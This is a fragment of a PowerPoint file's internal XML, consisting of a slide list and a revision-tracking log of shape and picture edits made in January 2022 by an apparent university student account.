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9" r:id="rId7"/>
    <p:sldId id="270" r:id="rId8"/>
    <p:sldId id="271" r:id="rId9"/>
    <p:sldId id="274" r:id="rId10"/>
    <p:sldId id="280" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="276" r:id="rId13"/>
    <p:sldId id="281" r:id="rId14"/>
    <p:sldId id="277" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="279" r:id="rId17"/>
    <p:sldId id="2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4BBEE1-D5FF-47AB-9D90-E34CD7172449}">
          <p14:sldIdLst>
            <p14:sldId id="257"/>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
            <p14:sldId id="270"/>
            <p14:sldId id="271"/>
            <p14:sldId id="274"/>
            <p14:sldId id="280"/>
            <p14:sldId id="273"/>
            <p14:sldId id="276"/>
            <p14:sldId id="281"/>
            <p14:sldId id="277"/>
            <p14:sldId id="272"/>
            <p14:sldId id="27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5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" v="28" dt="2022-01-12T16:24:28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1915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd addSection delSection modSection">
      <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-12T16:24:28.531" v="1731" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:35:23.466" v="1420" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3529114326" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:35:23.466" v="1420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">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T16:37:40.346" v="1617" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="545935490" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T16:37:40.346" v="1617" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="545935490" sldId="271"/>
            <ac:spMk id="3" creationId="{76276BD9-1B4F-44F0-9B47-6966D324F2AE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-12T13:59:39.941" v="1631" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2345756284" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T14:07:44.788" v="931" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2345756284" sldId="272"/>
            <ac:spMk id="37" creationId="{BD9B0919-1397-4624-BC6F-434190672306}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-12T13:59:39.941" v="1631" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2345756284" sldId="272"/>
            <ac:spMk id="39" creationId="{128BA7EF-D3B4-40A2-9294-4EAD4D00D357}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-12T13:59:31.013" v="1620" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2345756284" sldId="272"/>
            <ac:spMk id="40" creationId="{F1AD8557-C2D8-48B5-B95B-877CCFCD4A8C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modShow chgLayout">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:27:03.139" v="1395" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2067075105" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:26:11.015" v="1385" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2067075105" sldId="273"/>
            <ac:spMk id="2" creationId="{82DD4AF2-F285-4BD4-876E-220FA6EFBED8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:26:48.344" v="1393" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2067075105" sldId="273"/>
            <ac:spMk id="3" creationId="{5282346F-9A86-43E4-A355-4566074A63E5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:27:03.139" v="1395" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2067075105" sldId="273"/>
            <ac:spMk id="6" creationId="{3E041A00-11BE-4420-9FBC-2CE5469BFD3F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T15:36:36.699" v="11" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2067075105" sldId="273"/>
            <ac:spMk id="7" creationId="{B8D757F8-5390-41F6-988E-9614A06411EE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T15:36:36.699" v="11" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2067075105" sldId="273"/>
            <ac:spMk id="8" creationId="{E7C43EFE-887A-4940-8A44-909DAB928639}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:20:22.392" v="1325" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2067075105" sldId="273"/>
            <ac:picMk id="5" creationId="{98004F47-1050-4B8E-9217-238117CBE3B4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:26:55.993" v="1394" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2067075105" sldId="273"/>
            <ac:picMk id="7" creationId="{C4AA9DC6-6333-487A-8762-3BB980619E9D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod ord">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T16:31:53.349" v="1608" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1388340920" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:16:20.729" v="695" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1388340920" sldId="274"/>
            <ac:spMk id="2" creationId="{809AE466-F9E3-45EB-8C0E-1ECD692F49A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T16:31:53.349" v="1608" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1388340920" sldId="274"/>
            <ac:spMk id="3" creationId="{FE9D52BE-8DB8-4D0F-9EE1-3CA9C377B7A5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T15:46:26.360" v="64" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1388340920" sldId="274"/>
            <ac:spMk id="4" creationId="{0D13E6AF-5DB5-4E6E-AE1D-1B39A2062DF2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T15:55:31.072" v="89"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1388340920" sldId="274"/>
            <ac:spMk id="5" creationId="{D566F74B-31A7-4920-A42B-F0BF12D82633}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:02:57.956" v="361" actId="11529"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1388340920" sldId="274"/>
            <ac:spMk id="6" creationId="{4786A061-633B-494F-A606-3EEBE185D1DE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:06:01.410" v="436" actId="11529"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1388340920" sldId="274"/>
            <ac:spMk id="7" creationId="{92492E76-2AD4-431E-A2C3-91A38CAD23DF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T13:50:31.832" v="761" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1388340920" sldId="274"/>
            <ac:spMk id="8" creationId="{344FD89C-B28F-4E83-B77A-3AFD36EFE883}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new del mod modClrScheme chgLayout">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:04:45.311" v="1306" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1829928100" sldId="275"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T15:32:39.086" v="1" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1829928100" sldId="275"/>
            <ac:spMk id="2" creationId="{53AD18F9-A7E0-4EE9-989D-1DC9A63D444C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T15:32:39.086" v="1" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1829928100" sldId="275"/>
            <ac:spMk id="3" creationId="{1D73C2AC-065E-4DFD-89B6-71A6B12E9037}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod setBg modClrScheme chgLayout">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:28:54.868" v="755" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2455841455" sldId="276"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:09:04.540" v="487" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="2" creationId="{97EE24B7-49CC-44F8-917F-219CAE04A046}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:09:04.540" v="487" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="3" creationId="{9A69D733-4170-4BA8-9CD8-12BA7BC7B259}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:09:22.166" v="491"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="4" creationId="{7D41C17E-FB97-4C05-B2B0-DBA36DEF3EA0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:11:17.156" v="533" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="5" creationId="{40457618-EBB5-411C-8B3E-5539EC0C2148}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:10:13.648" v="515"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="6" creationId="{F48CFA74-73B1-4166-87C0-F6D8A18E8387}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:10:44.066" v="529" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="7" creationId="{1B087860-3D5A-4E1F-AD26-25C78848379F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:10:54.472" v="531" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="8" creationId="{F3B8A85F-E230-4C39-AD7E-D56C54F1A716}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:10:54.472" v="531" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="9" creationId="{7CF26A4D-395C-40C7-8637-DF40C70B7A2E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:11:37.641" v="538" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="10" creationId="{C9D506D3-8DB1-4940-9AAA-E337FCE63B57}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:13:04.575" v="564" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="11" creationId="{D95E05DE-2951-4BF2-A974-C2FD489A5131}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:12:36.890" v="556"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="12" creationId="{6CABFE27-D955-49EC-A3F2-EC80DD6FDF75}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:15:31.997" v="653" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2455841455" sldId="276"/>
            <ac:spMk id="13" creationId="{4804E9F5-A784-418F-9668-D7E859887EE8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:38:58.510" v="1426" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2509000171" sldId="276"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T14:08:00.256" v="933" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509000171" sldId="276"/>
            <ac:spMk id="2" creationId="{70B455E4-3593-4E7B-8904-64E00ADBDE27}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T14:08:00.256" v="933" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509000171" sldId="276"/>
            <ac:spMk id="3" creationId="{ED2DE099-25A4-4C0B-B34C-12FD7A487D8B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T14:08:10.044" v="935" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509000171" sldId="276"/>
            <ac:spMk id="5" creationId="{5E3C9E4B-992D-4ABD-A466-9A7F1E6163CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:00:18.655" v="1280" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509000171" sldId="276"/>
            <ac:spMk id="7" creationId="{22C99DE5-61DB-46FC-A9B0-296E5231FFEF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T14:18:05.317" v="1128" actId="17032"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509000171" sldId="276"/>
            <ac:spMk id="8" creationId="{74953F62-866B-4FFC-8654-EEE73AE91DDA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:38:58.510" v="1426" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509000171" sldId="276"/>
            <ac:spMk id="10" creationId="{846706B1-FFED-4679-B5E3-26D91B2052B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:01:42.033" v="1304" actId="17032"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509000171" sldId="276"/>
            <ac:spMk id="11" creationId="{A1CA5C07-BC61-44CD-A692-8041FA2C945D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:38:48.698" v="1425" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509000171" sldId="276"/>
            <ac:picMk id="3" creationId="{EC8E5703-F16B-4CAF-87C9-03CBA3E9D342}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:15:27.012" v="651"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1368872332" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-10T16:15:27.012" v="651"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1368872332" sldId="277"/>
            <ac:spMk id="3" creationId="{FE9D52BE-8DB8-4D0F-9EE1-3CA9C377B7A5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:57:58.435" v="1593" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1446588109" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:50:06.720" v="1567" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1446588109" sldId="277"/>
            <ac:spMk id="3" creationId="{1E3E5198-C0C4-4B12-9ECD-068AB395112C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:52:26.896" v="1577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1446588109" sldId="277"/>
            <ac:spMk id="5" creationId="{FEB1718B-57DC-4AD4-9F48-F1F1F87DBAF1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="31915007158@std.bau.edu.jo" userId="5a24e8d6-690a-4e1c-b163-8241be227c91" providerId="ADAL" clId="{88F5DF18-AB9A-41CE-9FB0-1E970CBF7CF6}" dt="2022-01-11T15:50:13.669" v="1568" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1446588109" sldId="277"/>
